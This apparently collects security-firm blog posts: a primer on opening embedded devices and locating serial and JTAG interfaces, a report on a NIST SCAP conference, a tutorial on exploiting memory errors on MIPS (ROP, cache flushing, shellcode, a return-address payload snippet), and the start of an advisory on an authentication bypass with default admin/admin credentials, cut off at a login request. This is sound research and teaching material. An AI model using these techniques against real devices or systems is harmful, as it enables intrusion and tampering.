Embedded hardware analysis primer

An important part of the security activities carried out at Emaze involves testing the hardware of embedded devices like routers, access points, or even more security-sensitive equipment. The focus of this kind of analysis is to find out how to access the internals of the device under test, interact with the underlying system, modify its behavior, and extract data in ways not intended by its normal functionality.
This becomes critical if the device contains highly sensitive data that should not be available to the user (even if this is normally a sign that something is wrong in the design of the system, protocol, or application!).

Most of these devices include a fairly powerful CPU (typically an ARM or MIPS processor) with a decent amount of RAM and flash, and they typically run a Linux kernel, which opens them up to hacking. We want to share here some basic information on how to proceed and which tools can be used in the process.

Inspect and open the case

The first step is to inspect the device and find a way to gain access to the internal board for analysis.
Before opening anything, inspect the case and check carefully whether there are interesting external interfaces, like a serial port or test points, that are accessible without opening the device. If so, you can apply the same techniques described below for a board you have already exposed.

Usually the case is held together with screws or a snap-in mechanism, so it can be opened easily with common tools. A screwed case just needs a screwdriver; a snap-in case can be opened with a knife or a sharp screwdriver (the snap tabs are normally located in the middle and near the corners).

Sometimes you will find "exotic" screws (so-called "security" screws, with unusual head shapes) used as an anti-tamper mechanism. If you don't have the matching screwdriver available (search on Google first!), a brute-force approach can be used, especially if you don't need to return the device intact (which usually applies to this kind of activity). In this case you can just drill or cut the case.

It is less common on these devices to find tamper detection mechanisms (micro-switches or other sensors), which are meant not only to determine whether a device has been tampered with but, in some cases, also to react. This is sometimes used to prevent an attacker from accessing sensitive data (like encryption keys), by erasing it or rendering the device non-operational. One example is the famous IBM cryptographic coprocessor card: the key material is stored in battery-backed RAM, so that any attempt to gain access to the memory results in a power cut and data loss.

If you suspect there is a protection mechanism in place (read the device documentation or warranty card; statements about tamper protection can sometimes be found there), a good route, unless you have more information available, is to get access to two devices: sacrifice one to study the tamper protection, then attack the second. Anyway, unless the device you are dealing with contains particularly sensitive data (like the above crypto card), it is unlikely that the protection mechanism is particularly sophisticated.


Board inspection

Now that you have access to the board, you can start inspecting it to understand its structure, identify the chips used, and locate "communication" interfaces. The objective is not to derive a full schematic of the circuit (i.e., the exact interconnection between all components) but just to identify most components and determine their functionality, to target further analysis.

Unless the markings have been removed (to hinder reverse engineering of the device), chips carry the part number and the vendor logo and/or name. Some parts (mostly CPUs) can have a heatsink glued on (remove it gently with a sharp screwdriver) or bolted to the PCB (in this case desoldering is not recommended, to avoid breaking the circuit board; better to cut the bolts with a grinding tool). With this information at hand we can search for the datasheet on the vendor's site (or just google for it). You may also run into epoxy-protected areas (a clear indication of a particularly sensitive device), which are not easy to inspect. One approach is to heat the epoxy and then carefully remove it using a sharp tool (taking care not to damage the underlying parts).

PCB with marked parts (CPU, flash, RAM)


Sometimes the chip datasheet is not available unless you sign an NDA and commit to big stock orders (probably in the millions of parts!), and only a brief description on the vendor's site can be obtained. This at least gives some information about the part's functionality.

For the devices mentioned in the introduction we expect to find at least the following parts:
  • CPU
  • RAM
  • Flash (parallel and/or serial)
and since our interest is to interact with the system and to inspect the firmware for vulnerabilities or modify it, we are going to look for signs of interfaces that can give us this kind of access. The most common and useful for our goal are serial ports and JTAG interfaces.

Inspecting the board, we look for PCB headers or header mounting holes; these are commonly where interface signals are brought out to the outside world. You may also find (especially if no header or header mounting hole is present) test points: PCB pads (sometimes gold plated or tinned) used during the testing and programming phase at the factory.

Test pads


Header (serial port)

To ease subsequent steps it is a good idea to identify the ground and power supply signals. To do this, disconnect the power supply, identify ground on the PCB (for example the metal shield of a USB connector, the PSU connector ground, etc.) and use a multimeter to find the pins connected to ground.

Do the same for the power supply: identify the VDD pin of an easy-to-probe chip for which you have the datasheet and trace it with the multimeter.

Having analyzed the board and gained some information from the component datasheets or from the Internet, we now try to find where the interface signals are located.

If datasheets are available, we can trace part pins as done for ground and power supply, following these steps:
  • Identify the pins for the interface (serial port or JTAG) from the part datasheet
  • Locate them on the chip package
  • Put one multimeter probe on a pin
  • Probe all identified points with the other
This is doable if the part package has accessible pins (TQFP is an example), which is nowadays becoming less common. Most CPUs now come in BGA packages, which means the connections from the die are underneath the package, making them hard to access. This kind of package has small solder spheres in a grid layout, which are melted during the soldering phase to connect to the copper pads on the PCB below.

In this case we can use the following technique for tracing signals: since a copper pad may be a via (a through-hole path going to the other side of the PCB), we can map the pins to the bottom side of the board and trace from there. If the vias are protected with solder resist, it has to be gently scratched away with a knife. A good lens is required during this process!

Another option, applicable only to the outer signals (with respect to the package grid), is to build a probe with nichrome wire (used in electric heating elements; a piece can be salvaged from a broken hair dryer, for example): tape a small piece of wire to the multimeter probe and use it like a whisker, pushing it under the package. This is not easy, of course, and is error-prone (you will probably short two solder balls together), but with some practice it can be useful.

Of course it is not always necessary to perform this step (even if it helps in particularly difficult cases); as we will see below, a serial console, for example, can be identified in other ways.

Serial console

A serial port is commonly used in embedded systems as a communication interface to interact with and control the device, and since we are speaking of Linux-based devices it normally hosts the system console. The console is also used by the bootloader (which initializes the system, loads the kernel from flash memory and boots it), so connecting to it will not only give system boot messages (and hopefully a system shell!) but also a way to interact with the boot process and possibly download/upload flash images.

Beware that in some systems the serial port is not initialized by the bootloader (precisely to prevent this kind of hack), typically based on a value stored in flash or some other condition: at the factory the port is used for device testing and programming, and after this phase the value is changed to disable output on the port. This makes it impossible to find and interact with the console unless the condition is changed, which first requires reversing the bootloader (which can be obtained by reading the flash, as explained below) to understand how to re-enable it.

The serial port is directly connected to the CPU UART pins, so it does not use RS-232 levels (i.e., the electrical levels used to represent 0's and 1's) but CPU logic levels (roughly: near ground for 0, near VDD for 1), so a level converter is required. There are plenty around; be sure to select one that can work at your device's VDD value. You can also use USB serial adapters (they simply lack the usual TTL-to-RS-232 level conversion chip), or some cheap USB phone cables (one example is the Nokia CA-42 cable; clones are really cheap).

Using the previously gathered information, if the UART pins have already been traced, we can connect our level converter and, using a terminal, test different baud rates (common ones are 115200 and 9600) until we get something consistent. Power-cycle the device during this process, since the bootloader normally starts to spit out characters during boot.
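If you prefer to automate the guesswork, a short script can cycle through the common rates and report which one yields mostly printable output. Here is a minimal sketch using the pyserial library; the device name /dev/ttyUSB0 is an assumption and depends on your adapter:

import serial  # pyserial

PORT = "/dev/ttyUSB0"  # hypothetical device name, depends on your adapter
RATES = [115200, 57600, 38400, 19200, 9600]

for rate in RATES:
    with serial.Serial(PORT, rate, timeout=3) as uart:
        data = uart.read(256)  # power-cycle the device while this runs
    if data:
        printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
        print("%6d baud: %d%% printable" % (rate, 100 * printable // len(data)))

The rate that produces a high percentage of printable characters is almost certainly the console speed.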

If no pins have been traced, one can try the same method by probing pins (after checking voltage levels first, to avoid damaging the serial adapter), but this can be a long and error-prone process. The way to go is to probe pins with an oscilloscope (or a logic analyzer) and observe the signal until a train of pulses resembling an asynchronous serial signal is found. With a digital storage oscilloscope you can also measure the pulse length and determine the baud rate from it (e.g., 9600 baud has a bit duration of roughly 104 µs).
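Given a measured bit duration, the nearest standard rate can be computed directly; a quick sketch of the arithmetic:

def baud_from_bit_time(bit_seconds):
    # Map a measured bit duration to the closest standard baud rate.
    standard = [300, 1200, 2400, 4800, 9600, 19200, 38400, 57600, 115200]
    return min(standard, key=lambda rate: abs(rate - 1.0 / bit_seconds))

print(baud_from_bit_time(104e-6))  # ~104 us per bit -> 9600
print(baud_from_bit_time(8.7e-6))  # ~8.7 us per bit -> 115200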

Lacking an oscilloscope (it doesn't make sense to buy one just to find a serial port once), an Arduino board comes to the rescue. Arduino is an easy-to-use and very cheap prototyping platform based on an AVR microcontroller, which can be programmed over its USB port. There are a lot of boards available from different places (the design is open source and clones exist). Since the microcontroller has an analog-to-digital converter, it can be used as a simple oscilloscope with the firmware and related PC application from the xoscillo project. Serial port signals are slow enough to be sampled with this setup.

Once TXD (the serial output signal from the CPU) is found, connect it permanently and move on to RXD. This is a little trickier: the idea here is to send out characters (now that we have determined the baud rate and can watch the system output) and observe the system's behavior. In most cases echo is active, so you will see the sent character come back. To avoid damaging other inputs, we suggest putting a resistor (1 kΩ is fine) in series with the line (TXD from the adapter).
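The echo test can be scripted too: send a byte on the candidate RXD line and check whether anything comes back. A minimal sketch, again with pyserial and a hypothetical device name:

import serial

with serial.Serial("/dev/ttyUSB0", 115200, timeout=2) as uart:  # use the rate found earlier
    uart.reset_input_buffer()  # discard pending boot messages
    uart.write(b"\r")          # a carriage return often elicits an echo or a prompt
    reply = uart.read(64)
print("got a reply" if reply else "no reply: wrong pin, or echo disabled")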

JTAG interface

JTAG is an industry-standard interface that was designed to test circuit boards during production, by providing a means to probe otherwise inaccessible connections. Given this characteristic, it is also used to debug the system CPU (or other controllers) and to program flash devices. These are exactly the features we want access to for our purposes.

The JTAG interface uses a serial protocol with 4 wires: TCK (clock), TDO (data out), TDI (data in) and TMS (test mode select, which drives the JTAG state machine). If more than one part has a JTAG interface, they can be daisy-chained by cascading TDO and TDI (first chip's TDO to second chip's TDI, for example). An adapter is required, and there are a lot out there. We suggest selecting one that can work with different logic levels, has protected lines, and works with UrJTAG (an open-source JTAG tool) and OpenOCD.

If the CPU has a JTAG interface (which is highly probable), we can get access to the debugging features of the processor itself, which we can leverage to alter firmware behavior (e.g., bypassing some security checks) and to access the flash memory, either to read its contents (dump the firmware image for later analysis) or to update them (upload a modified firmware image). As in the serial port case, if JTAG signal information has been obtained we have already mapped the pins and can connect the adapter and continue our work.
If the system has more than one chip with JTAG (it is common to have devices with an FPGA on board, and FPGA datasheets are normally available), it is also possible that they are daisy-chained; in that case we may have traced at least TCK, TMS and TDO or TDI, so with some trial and error we can find the missing signal and detect the devices on the chain.

If there are no other options, we can try the standard pinouts used for JTAG headers: map at least GND and VDD on the header and compare with known pinouts. If a match is found, we can connect our JTAG adapter and try to detect the chips on the chain.

If this fails, or no evident header is on the board, there is a nice tool called JTAGEnum which tries to identify JTAG pins among a bunch of candidate signals. It is Arduino-based (no surprise! Arduino is really a handy platform for hardware hacking) and, exploiting some characteristics of the JTAG interface, performs the mapping by trying the possible pin combinations. Remember to select an Arduino board that is compatible with your board's logic levels (or interpose a level-shifting adapter). After JTAGEnum has mapped the JTAG signals, wire up your adapter and use JTAG software to continue your work.

This process can still fail: take into account that some CPUs have ways to disable the JTAG interface (e.g., fuse bits programmed once after factory testing/programming) or to disable debug functionality.

Conclusions

Hardware security and hacking is a rather broad topic and requires knowledge of electronics, familiarity with hardware tools (soldering iron included) and embedded systems. This is just an introduction, meant to give some ideas. Working on a well-known device is a good starting point to get familiar with these topics.

Reportage from the 7th IT Security Automation Conference (ITSAC)

Three weeks ago (October 31st - November 2nd) I had the privilege to attend the 7th ITSAC in Arlington (Crystal City, Virginia), hosted by the National Institute of Standards and Technology (NIST) in conjunction with the Department of Homeland Security (DHS), the National Security Agency (NSA) and the Defense Information Systems Agency (DISA). The conference was about security automation through the development of the Security Content Automation Protocol (SCAP): “Security automation leverages standards and specifications to reduce the complexity and time necessary to manage vulnerabilities, measure security and ensure compliance, freeing resources to focus on other areas of the IT infrastructure” (http://www.nist.gov/itl/csd/7th-annual-scap-conference.cfm).
Although the primary intended “clients” of these efforts are US Federal Agencies and their IT providers (as required by the White House Office of Management and Budget), this set of standards and procedures could be used in both the public and private sector, as well as by other governments and their associated infrastructures (with some “adjustments” to meet national or local laws/regulations), becoming a significant component of large information security management and governance programs. Indeed, NIST encourages widespread support and adoption of SCAP.


In brief, what is SCAP?

“SCAP is a suite of specifications that standardize the format and nomenclature by which software flaw and security configuration information is communicated, both to machines and humans. SCAP is a multi-purpose framework of specifications that support automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement” (from NIST SP800-126r2).

Why adopt SCAP? “Organizations need to conduct continuous monitoring of the security configuration of each system... at any given time... to demonstrate compliance with various sets of security requirements... these tasks are extremely time-consuming and error-prone because there has been no standardized, automated way of performing them... the lack of interoperability across security tools... can cause delays in security assessment, decision-making, and vulnerability remediation” (from NIST SP800-117).

The Conference

It was definitely an amazing experience, and a real honor for me, to meet such great people and organizations, getting closer to (and exploring) the real world of SCAP one year after I started my own research on this subject here at eMaze's R&D Center in Trieste, Italy (where SCAP is still widely unknown and unsupported at the moment). The most impressive thing for me was to see how actively and deeply the US Government, as well as other well-known agencies, is involved in the development and improvement of SCAP, how much they believe in it, and how large the consensus is, within the military/intelligence community and beyond. Amongst the attendees I saw people from: the Department of Defense (DoD), Space and Naval Warfare Systems Command (SPAWAR), US Army, US Air Force, Department of State, USCYBERCOM, USSTRATCOM, Office of Naval Intelligence, National Nuclear Security Administration (NNSA), Department of Justice (DoJ), Department of Energy (DoE), NASA and so on...

I also found it remarkable to see, at an event like this, the presence of and interest in the subject from some universities, and not only from the US as far as I know. For example, Ms. Angela Orebaugh (Booz Allen Hamilton), whom I had the pleasure to meet, wrote an article about the University of North Carolina at Charlotte (UNCC), which also houses the Cyber Defense & Network Assurability (CyberDNA) Center (http://www.arc.uncc.edu). Her article is featured in the latest issue of the IAnewsletter (freely available here: http://iac.dtic.mil/iatac/download/Vol14_No4.pdf), focused on security automation. Many vendors, like nCircle, McAfee, Symantec, Juniper, Cisco, eEye, Tenable, Microsoft, Redhat, EMC and so on, were at the conference as well.

The conference stressed how much money the adoption of SCAP has allowed the US Government to save over the years (“reducing time AND money”), along with the concept of “near real-time” continuous monitoring (NIST SP800-137) as opposed to the “snapshot-in-time” model (“you must track anything”). To paraphrase a famous Lord Kelvin quote: “We cannot improve what we cannot measure”; but, as you know, it is not always so simple.


Measure Software Security

Sean Barnum (MITRE), in his presentation “Measure Software Security”, made the point about the great difference between “measuring” and “being measurable”, talking about the problem of integrating a new security solution with existing solutions and, consequently, why we need “Standardized Approaches and the application of Architecting Principles”.
It's not the standards but how you use them
For all the readers unfamiliar with MITRE's view of security and measurement, you should know that they proudly sponsor and maintain the “Making Security Measurable” (MSM) initiatives “to provide the foundation for answering today's increased demands for accountability, efficiency, resiliency, and interoperability without artificially constraining an organization's solution options” (http://measurablesecurity.mitre.org).



Risk Analysis and Measurement

“Risk Analysis and Measurement with CWRAF” by Richard Struse (DHS) and Steve Christey (MITRE) was another presentation that I appreciated very much. They made a clear and important distinction between “weaknesses” and “vulnerabilities” in the context of security automation and software assurance:
A (software) weakness is a property of software/systems that, under the right conditions, may permit unintended / unauthorized behavior
while
A (software) vulnerability is a collection of one or more weaknesses that contain the right conditions to permit unauthorized parties to force the software to perform unintended behavior (a.k.a. “is exploitable”)

Please note the absence of the word “mistake” in these definitions...
Nowadays we are able to identify vulnerabilities with CVE identifiers, to score their impact with CVSS metrics and to classify weaknesses thanks to the Common Weakness Enumeration (CWE). Some examples of CWE are:
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  • CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
However, we would like a way to specify priorities based on business/mission risk. So, “How do I identify which of the 800+ CWEs are most important for my specific business domain, technologies and environment?”. To answer this question, MITRE provides the Common Weakness Risk Analysis Framework (CWRAF) - http://cwe.mitre.org/cwraf/index.html. In turn, the Common Weakness Scoring System (CWSS) allows us to answer the question: “How do I rank the CWEs I care about according to my specific business domain, technologies and environment?” - http://cwe.mitre.org/cwss/index.html.

Getting the Network Security Basics Right

In “Getting the Network Security Basics Right” by Paul Bartock (NSA) and Steve Hanna (Juniper), Mr. Bartock shared with us some lessons learned by the Agency (I guess they learned many, many other things), while Mr. Hanna talked about “Trusted Network Connect & SCAP Use Cases”. These lessons, although expressed as short sentences (unsurprisingly), have deep implications in our world:
  • The optimal place to solve a security problem is ... never where you found it.
    Corollary: the information for the solution is never in the right form for the solution.
  • If it is happening to you today, then ... something very much like it happened to someone else yesterday, and will happen to someone else tomorrow.
    Corollary: and you probably don't know them.
  • After you figure out what happened, there were ... plenty of signs that *could* have helped us prevent or manage this.
    Corollary: but not all the signs are in “cyberspace” or available to “cyber defenders” (this is the best one, and the most subtly winking, in my opinion. Can you “read between the lines”?)
  • Information sharing is ... over-rated!
    Corollary: until you think about Purpose, Content, Plumbing, and the Framework.

NVD CPE Dictionary

“NVD CPE Dictionary Management Practices” by Christopher McCormick (Booz Allen Hamilton) was, for me, a very important presentation (due to part of my job here at eMaze). We have exchanged many emails over the last months, working hard together on the correctness of many CPE names contained within the National Vulnerability Database (NVD) data feeds and the Dictionary itself (http://nvd.nist.gov). I wish to thank Chris for his professionalism, helpfulness and patience.
His presentation started by describing the history of the transition to CPE at NVD, from proprietary product naming, through the initial CPE 2.1 support, to the present day, with NVD becoming the primary source of CPE names based upon the Dictionary (containing about 35000 CPE names at the moment). After describing the CPE Dictionary management process, Chris gave a demo of the new CPE submission interface on the NVD web site, which greatly improves the management of names within the Dictionary.
"Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise's computing assets" from NIST IR-7695. For example, the following is a formal and standardized way to describe the ubiquitous Microsoft Windows XP SP3 (try to think how many times we have seen different documents/reports/advisories referring to the same platform using strings like "Windows XP Service Pack 3" or "Win XP SP3") :
cpe:/o:microsoft:windows_xp::sp3
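The CPE 2.2 URI behind that string is just a colon-separated list of components (part, vendor, product, version, update, edition, language), with empty trailing fields omitted; a small illustrative Python helper:

def cpe_uri(part, vendor, product, version="", update="", edition="", language=""):
    # Build a CPE 2.2 URI, dropping empty trailing components.
    fields = [part, vendor, product, version, update, edition, language]
    while fields and fields[-1] == "":
        fields.pop()
    return "cpe:/" + ":".join(fields)

# Windows XP SP3: note the empty "version" slot before the "sp3" update field
assert cpe_uri("o", "microsoft", "windows_xp", "", "sp3") == "cpe:/o:microsoft:windows_xp::sp3"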


OVAL 5.10

Jon Baker (MITRE), in his presentation “OVAL 5.10 Update”, talked about the Open Vulnerability and Assessment Language, a community-developed open standard that enables automated assessment and compliance checking. The OVAL Language is an XML-based framework for making logical assertions about a system (further information: http://oval.mitre.org). “OVAL provides the low level system assessment capability” and can be used to perform vulnerability assessment (e.g., credentialed scans) and configuration management (defining the desired configuration and monitoring systems), just to mention some of OVAL's use cases.
 
Common Configuration Scoring System (CCSS)

Not all “unauthorized accesses/actions” necessarily derive from bad pieces of code. Attackers can often take advantage of improperly configured settings or misconfigurations (e.g., directory listing on a web server).
Before taking any step further in thinking (or talking) about the automation of security checks on these settings, we need to be able to uniquely identify security settings and configurations. Similarly to the CVE effort, the Common Configuration Enumeration (CCE) assigns a unique, common identifier to each particular security-related configuration issue. “CCE identifiers are associated with configuration statements that express the way humans name and discuss their intentions when configuring computer systems. In this way, the use of CCE Identifiers (CCE-IDs) as tags provides a bridge between natural language, prose-based configuration guidance documents and machine-readable or executable capabilities such as configuration audit tools”. For further information see http://cce.mitre.org.

The following is an example of a standard CCE identifier which represents a configuration requirement:
CCE-4191-3 (RHEL 5): “The dhcp client service should be enabled or disabled as appropriate for each interface”.

Having a way to identify security configuration settings, the next step is to be able to “rank” the security impact of configuration choices in a system, just as CVSS, for example, scores vulnerabilities (CVE). In this regard, Karen Scarfone (Scarfone Cybersecurity) introduced the Common Configuration Scoring System (CCSS), “a universal way to convey the relative severity of security configuration choices”, based on CVSS version 2 and therefore on a set of metrics and formulas. Ms. Scarfone highlighted the fact that CCSS is “not a risk assessment solution”. Why should we use CCSS? Basically because “understanding security implications of each configuration option allows better risk assessment and sound decision-making”.
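Since CCSS borrows its metrics and equations from CVSS version 2, the underlying arithmetic is the familiar CVSS v2 base score. A sketch of those base equations, with the coefficients taken from the CVSS v2 specification:

def cvss2_base(av, ac, au, c, i, a):
    # CVSS v2 base score; arguments are the numeric values of the six base metrics.
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * av * ac * au
    f = 0 if impact == 0 else 1.176
    return round((0.6 * impact + 0.4 * exploitability - 1.5) * f, 1)

# AV:N/AC:L/Au:N/C:C/I:C/A:C scores the maximum 10.0
print(cvss2_base(av=1.0, ac=0.71, au=0.704, c=0.660, i=0.660, a=0.660))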
Many other interesting subjects that I would like to share with you were presented and discussed at the conference, like the standards for asset identification, IF-MAP, XCCDF, CEE and EMAP, MAEC... but a blog post is not enough to cover and explain them all. Hopefully this post will be only the first one on the subject.


Exploiting MIPS embedded devices

Several security activities here at Emaze involve embedded devices, such as routers, access points, web cams, and so on. Today these devices are widespread, as several manufacturers and content providers push embedded hardware peripherals to their customers. Unfortunately, the security level of such platforms is often questionable. In this post we focus on a specific category of security flaws, memory errors; we discuss their impact on embedded platforms and give an overview of possible exploitation techniques and countermeasures.

Most of the devices we typically deal with are powered by MIPS or ARM processors. In the following we discuss only the security-relevant aspects of the big-endian 32-bit MIPS architecture, but most of the material applies to the ARM platform as well. We assume the reader is familiar with the exploitation of memory errors on the Intel x86 architecture.


A glimpse at the MIPS architecture
MIPS is a RISC instruction set architecture (ISA) often used in broadband routers, network gateways, and other embedded devices. MIPS CPUs can boot in either big- or little-endian configuration. There exist 32- and 64-bit versions of this ISA, but the former is certainly more common in embedded systems. As mentioned above, in this blog post we focus on the big-endian 32-bit MIPS architecture. In the next paragraphs we introduce some details of the MIPS ISA that are relevant for the exploitation of memory errors. For a comprehensive reference on MIPS, interested readers can refer to this book.

MIPS ISA
As MIPS is a RISC ISA, instructions have a fixed length: every MIPS instruction is 4 bytes long. On MIPS, 32-bit memory accesses must be 4-byte aligned; as a consequence, instructions must be placed at 4-byte-aligned memory locations, otherwise a hardware exception is raised by the CPU. Another fundamental aspect of MIPS is its pipelined architecture and the impact of the pipeline on instruction execution. From a programmer's (and attacker's) perspective, the most important consequence is that, when a branch instruction is executed, the instruction right after the branch is executed before control reaches the branch target. The instruction position immediately after a branch is called the branch delay slot.

Calling convention
When a function is called, the first four parameters are passed through registers $a0 through $a3, and the remaining parameters are pushed on the stack. When the callee terminates, it stores the return value in register $v0 ($v1 can also be used for a second return value, but this is not very common). As we will deal with memory errors, an important point is where a function's return address is stored. Differently from the x86 architecture, when a function is called the return address is not pushed on the stack: the architecture reserves a special-purpose register for it, namely $ra. However, since there is just a single instance of this register, the previous value of $ra must be saved somewhere, otherwise nested function calls would not be possible. For this reason, the compiler arranges the prologue of non-leaf functions (i.e., functions that in turn call other procedures) to save $ra on the stack, in order to be able to restore its original value in the epilogue. As a consequence, only the return address of the current function is stored in $ra, while the others are still on the stack. Let's see a very simple example by examining the following C program:
int foo(int a, int b, int c, int d, int e)
{
    return a+b;
}

int main(int argc, char **argv)
{
    return foo(1, 2, 3, 4, 5);
}
The main() procedure invokes foo(), passing five arguments. The disassembly of main() is shown in the next figure. Registers $a0 through $a3 are used to store the first four arguments, while the last one is pushed on the stack (addresses 0x00400640-0x00400644). As main() is not a leaf function (it invokes foo()), the $ra value is saved in the prologue and restored in the epilogue.


The assembly code of foo(), depicted in the next image, is really simple, but it highlights the use of branch delay slots: foo() computes the sum of the first two parameters, but the addu instruction is placed right after the “jump to $ra” statement; although addu follows the branch instruction, its execution completes before the branch target is reached.


Stack smashing protection
Embedded devices are not as protected against exploitation attempts as traditional systems, but they are not entirely without defenses either. In this section we give a brief overview of the existing stack smashing protections for MIPS systems, including address space layout randomization (ASLR), execution prevention (W^X) and stack canaries (SSP, in GCC jargon). In the following we focus on MIPS devices running Linux, as it is the most widely adopted operating system for this class of devices.

Address space layout randomization
Linux has randomized the stack layout of MIPS processes since version 2.6.23. Starting from kernel 2.6.26, the heap and shared libraries are randomized as well. To the best of our knowledge, PIE executables are not very common on MIPS, and even shared libraries are often not randomized in practice.
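Randomization is easy to observe on a live Linux system: spawn two fresh processes and compare their stack mappings. A quick sketch:

import subprocess

# Each invocation is a new process, so with stack ASLR enabled the two
# "[stack]" address ranges printed below should differ.
for _ in range(2):
    maps = subprocess.check_output(["cat", "/proc/self/maps"]).decode()
    print(next(line for line in maps.splitlines() if "[stack]" in line))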

"W^X" protection
Briefly, systems that implement the "W^X" (Write XOR eXecute) protection guarantee that a memory page is never both writable and executable at the same time. This kind of protection is usually enforced for those sections that may store user-controlled data (e.g., the stack). On Intel processors this policy is enforced through the NX page protection bit. At the time of writing, we are not aware of any MIPS processor with hardware support for the "W^X" protection. However, considering the rapid diffusion of MIPS devices, it is probably just a matter of time before these CPUs also start to include something similar to the Intel NX bit.
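On Linux, whether a given process's stack actually ended up executable can be checked from its memory map. A small sketch that inspects the current process:

# "rw-p" on the "[stack]" mapping means the stack is not executable;
# "rwxp" means injected code on the stack could run directly.
with open("/proc/self/maps") as maps:
    stack = next(line for line in maps if "[stack]" in line)
perms = stack.split()[1]
print("stack permissions:", perms)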

Stack canaries
Canary protection is named SSP (Stack-Smashing Protection) in current GCC versions and, for the MIPS architecture, has been implemented starting from GCC 4.5. Besides being supported by the compiler, the SSP protection must also be supported by the run-time libraries (uClibc has supported SSP since 2004).

The next figure demonstrates how GCC 4.5 implements SSP on MIPS. The implementation is very similar to that on the x86 platform. The canary is loaded from the global variable __stack_chk_guard and stored on the stack next to function local variables (0x004003f0). Then, during function epilogue, __stack_chk_guard is compared with the current value of the canary stored on the stack (0x00400430); if the two values differ, then execution is aborted by calling __stack_chk_fail.


Exploitation
Overall, the exploitation of memory error vulnerabilities on embedded devices is almost the same as on traditional (i.e., x86) architectures. However, several subtle details must be taken into account in order to build effective and reliable exploits. First of all, when dealing with embedded devices we must usually focus on remote exploits, as attackers can rarely leverage local access to the device. In addition, attacks that rely on brute forcing and crash the target process when the exploit fails are typically not suitable for embedded systems: these devices often run a big, single-threaded binary that provides most of the application-level functionality; if this process crashes, the whole device becomes unusable.

Memory alignment
As we already mentioned, branch targets must be 4-byte aligned. On MIPS Linux systems, processes that perform unaligned control transfers are terminated with a SIGILL signal. As an example, when exploiting a vulnerability that allows overwriting a code pointer (e.g., a saved return address), the new value must be aligned on a word boundary.
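When crafting the payload, the alignment constraint is easy to enforce programmatically. A tiny sketch for a big-endian 32-bit target; the address and padding length are of course hypothetical:

import struct

ret_addr = 0x2ab51234  # hypothetical value overwriting the saved return address
assert ret_addr % 4 == 0, "unaligned MIPS branch target"
payload = b"A" * 64 + struct.pack(">I", ret_addr)  # ">I": big-endian 32-bit word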

ROP and MIPS
"Return oriented programming" (ROP) is a popular exploitation technique, that can be considered as an evolution of the traditional "return-into-lib(c)" strategy, proposed by Solar Designer back in 1997. In a nutshell, return oriented programming consists into borrowing existing code chunks (gadgets) from the virtual address space of a target process; each code chunk terminates with a control transfer instruction (CTI), and the stack layout is prepared so that these CTIs chain multiple chunks together. In the last years, ROP has demonstrated to be effective against NX and partial ASLR, and it has been also used as the basic building block for surgically precise exploitation techniques.

Obviously, ROP also applies to MIPS; however, two characteristics of the architecture complicate exploitation. First, MIPS instructions are 4 bytes long and, due to memory alignment checks, it is not possible to jump into the middle of existing instructions. Second, branch delay slots must be kept in mind: even if a gadget terminates with a branch instruction, the instruction next to the branch will also be executed before control is transferred to the next code chunk. Overall, these complications may drastically reduce the number of useful code chunks available.

Cache coherence
MIPS CPUs have two separate caches: the instruction cache (I-cache) and the data cache (D-cache). As the names suggest, code and data are cached in the I-cache and D-cache, respectively. Once a cache is full, it is flushed, i.e., its content is written back to main memory.
But why should caches affect exploitation? As the attack payload is typically handled by the application as data, it will be stored in the D-cache. When the payload triggers the vulnerability and hijacks the application's control flow, execution is transferred to the memory address of the shellcode. However, if the D-cache has not been flushed yet, the shellcode is still stored inside the D-cache and not in main memory. As a consequence, the target application will execute whatever is located at the memory location where the attacker intended to store the shellcode, with unexpected consequences.

Attackers rely on two different solutions to overcome this problem. The first consists in filling the D-cache, to force the CPU to write the shellcode back to main memory. This approach is very simple to implement, but it is not free from limitations: as MIPS caches can store several kilobytes of data, the attacker must be able to inject a large amount of data into the address space of the target application in order to fill the D-cache. Unfortunately, this is not often the case.

A more effective and reliable solution consists in forcing the CPU to flush its caches. If the target system runs Linux, attackers can leverage the cacheflush system call to flush both the I- and D-caches. Exploitation is even easier if the vulnerable program is linked against the uClibc library, as it provides a cacheflush() function that can be invoked through ROP.

Shellcode
Writing a MIPS shellcode is not as easy as one would expect: all instructions are 4 bytes long, and it is quite difficult to build a NULL-free sequence of instructions that spawns a shell. A simpler solution is to leverage an encoder that decodes the core of the shellcode at run-time, such as the MIPS XOR encoder included in Metasploit. However, the Metasploit framework includes just a single MIPS shellcode (a TCP reverse shell). As a side note, it is worth noting that the Metasploit MIPS shellcode connects back to a hardcoded IP address; we recently submitted to the developers a patch that addresses this issue.

Conclusions
A lot of research effort has been put into the exploitation of memory errors, but most of this work focuses on x86, the most widely adopted computing architecture. With the diffusion of embedded devices, researchers (and attackers) have started to move their attention to these platforms. Today's embedded architectures introduce novel challenges for exploit developers that are not found in desktop or server environments. Despite this, the exploitation of memory error vulnerabilities is still possible, and is often made easier by the lack of proper software and hardware protection facilities.

ZOHO ManageEngine ADSelfService Plus Administrative Access

Advisory Information
Title: ZOHO ManageEngine ADSelfService Plus Administrative Access
Release date: 11/10/2011
Last update: 11/10/2011
Credits: Roberto Paleari, Emaze Networks S.p.A.

Vulnerability Information
Class: Authentication issue, Administrative access
CVE: CVE-2011-3485

Affected Software
  • ADSelfService Plus 4.5 Build 4521
Previous versions are probably also vulnerable, but they were not checked.

Vulnerability Details
ManageEngine ADSelfService Plus is a web-based password management infrastructure for Microsoft Windows Active Directory environments.

By default a local administrative account named "admin" is configured. The administrative password is stored inside the local database in base64(md5(P|S)) form (P is the plain-text password, S is a password salt, and '|' denotes string concatenation). In the default installation the password for the "admin" user is also "admin", but it can be changed after the first login.
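Following the advisory's description, the stored form can be reproduced in a few lines of Python (the salt value below is a made-up placeholder):

import base64, hashlib

def stored_form(password, salt):
    # base64(md5(P|S)), reading '|' as plain string concatenation as described above
    return base64.b64encode(hashlib.md5((password + salt).encode()).digest()).decode()

print(stored_form("admin", "someSalt"))  # "someSalt" is a placeholder, not the real salt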

Unfortunately, due to a bug in the authentication procedure, malicious users can authenticate without knowing the current plain-text password value.

Normal logins are performed through POST requests similar to the following:

POST /j_security_check HTTP/1.1
Host: ...
Content-Length: ...

